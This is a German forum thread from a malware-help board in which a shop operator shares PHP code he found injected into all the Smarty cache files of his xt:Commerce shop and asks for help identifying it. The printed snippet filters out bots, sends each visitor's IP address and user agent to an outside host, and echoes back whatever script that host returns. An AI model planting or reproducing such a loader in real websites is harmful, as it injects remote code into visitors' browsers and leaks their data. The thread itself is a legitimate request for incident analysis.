Zurück   Trojaner-Board > Web/PC > Alles rund um Mac OSX & Linux

Alles rund um Mac OSX & Linux: Schadsoftware auf Webserver (PHP)

Windows 7 Für alle Fragen rund um Mac OSX, Linux und andere Unix-Derivate.

 
Alt 13.05.2014, 14:29   #1
ShopNix
 
Schadsoftware auf Webserver (PHP) - Standard

Schadsoftware auf Webserver (PHP)



Auf einem Webserver fand ich folgenden Schadcode:

PHP-Code:
#c18fce#
error_reporting(0); ini_set('display_errors',0); $wp_j6451 = @$_SERVER['HTTP_USER_AGENT'];
if (( 
preg_match ('/Gecko|MSIE/i'$wp_j6451) && !preg_match ('/bot/i'$wp_j6451))){
$wp_j096451="hxxp://"."template"."body".".com/body"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_j6451);
$ch curl_init(); curl_setopt ($chCURLOPT_URL,$wp_j096451);
curl_setopt ($chCURLOPT_TIMEOUT6); curl_setopt($chCURLOPT_RETURNTRANSFER1); $wp_6451j curl_exec ($ch); curl_close($ch);}
if ( 
substr($wp_6451j,1,3) === 'scr' ){ echo $wp_6451j; }
#/c18fce# 
Falls jemand eine Ahnung hat, was das ist, ob es in Zusammenhang mit anderen Schweinereien auftritt, und ob ich nun alles auf den Kopf stellen muss, wäre ich für zweckdienliche Hinweise dankbar.

Die Sache fiel auf, weil das obige Snippet mangels Empfänger nicht mehr nach Hause telefonieren konnte. Die dadurch entstehende Verzögerung führte zu Ladezeiten von 2-3 Minuten statt der üblichen 5-10 Sekunden.

Der Codeblock war mit unterschiedlichen Kommentaren in allen Smarty-Cachefiles eines xt:Commerce-Shops enthalten.

Hinweis: Ich betreibe derlei Geschichten gewerblich, habe mir die Hinweise für neue Postings durchgelesen, kann aber als reiner Linux-User die angegebenen Programme nicht betreiben und infolgedessen auch die gewünschten Logs nicht liefern.

Falls ich als Neuling hierzuforum etwas übersehen haben sollte, nehme ich auch dazu Hinweise entgegen. Danke.

 

Themen zu Schadsoftware auf Webserver (PHP)
agent, ahnung, andere, anderen, errors, folge, folgende, geschichte, hinweise, minute, minuten, neue, neuling, nicht mehr, postings, programme, remote, sache, scr, stehe, stelle, telefonieren, transfer, verzögerung, zweckdienliche




Ähnliche Themen: Schadsoftware auf Webserver (PHP)


  1. Fünf Lücken im Apache-Webserver geschlossen
    Nachrichten - 18.07.2014 (0)
  2. Virus auf Webserver möglich?
    Plagegeister aller Art und deren Bekämpfung - 04.06.2014 (3)
  3. JS/EXP.Redir.EL.7 auf Webserver - wie vorgehen?
    Plagegeister aller Art und deren Bekämpfung - 04.06.2013 (1)
  4. Kritische Lücke im Webserver nginx
    Nachrichten - 07.05.2013 (0)
  5. Geknackte Webserver als Malware-Schleudern
    Nachrichten - 06.03.2013 (0)
  6. Schadstoffcode iauf meinem Webserver
    Diskussionsforum - 27.01.2013 (18)
  7. Webserver infiziert? Malware globalconferencemanagementgroup.com
    Plagegeister aller Art und deren Bekämpfung - 02.01.2013 (3)
  8. Rootkit befällt Linux-Webserver
    Nachrichten - 20.11.2012 (0)
  9. Sicherheitslücke auf Webserver der Schufa
    Nachrichten - 12.06.2011 (0)
  10. Webserver der Bundesfinanzagentur offen wie ein Scheunentor
    Nachrichten - 11.03.2011 (0)
  11. Apache Webserver Online bringen
    Alles rund um Windows - 24.01.2011 (10)
  12. JS:Illredir-W auf Webserver
    Plagegeister aller Art und deren Bekämpfung - 24.02.2010 (1)
  13. JS:Redirect-AM[Trj] auf Webserver von Versatel ohne php, css und js
    Plagegeister aller Art und deren Bekämpfung - 10.01.2010 (1)
  14. lokaler webserver? trojaner? dienst?
    Plagegeister aller Art und deren Bekämpfung - 11.03.2009 (1)
  15. Webserver -> Trojaner
    Plagegeister aller Art und deren Bekämpfung - 19.10.2008 (1)
  16. Trojaner auf dem Webserver
    Plagegeister aller Art und deren Bekämpfung - 14.01.2008 (2)
  17. Gentoo vs Debian auf einem Webserver
    Alles rund um Mac OSX & Linux - 16.12.2003 (20)

Zum Thema Schadsoftware auf Webserver (PHP) - Auf einem Webserver fand ich folgenden Schadcode: PHP-Code: #c18fce# error_reporting ( 0 );  ini_set ( 'display_errors' , 0 );  $wp_j6451  = @ $_SERVER [ 'HTTP_USER_AGENT' ]; if ((  preg_match  ( '/Gecko|MSIE/i' ,  - Schadsoftware auf Webserver (PHP)...

Alle Zeitangaben in WEZ +1. Es ist jetzt 00:02 Uhr.


Copyright ©2000-2025, Trojaner-Board
Archiv
Du betrachtest: Schadsoftware auf Webserver (PHP) auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.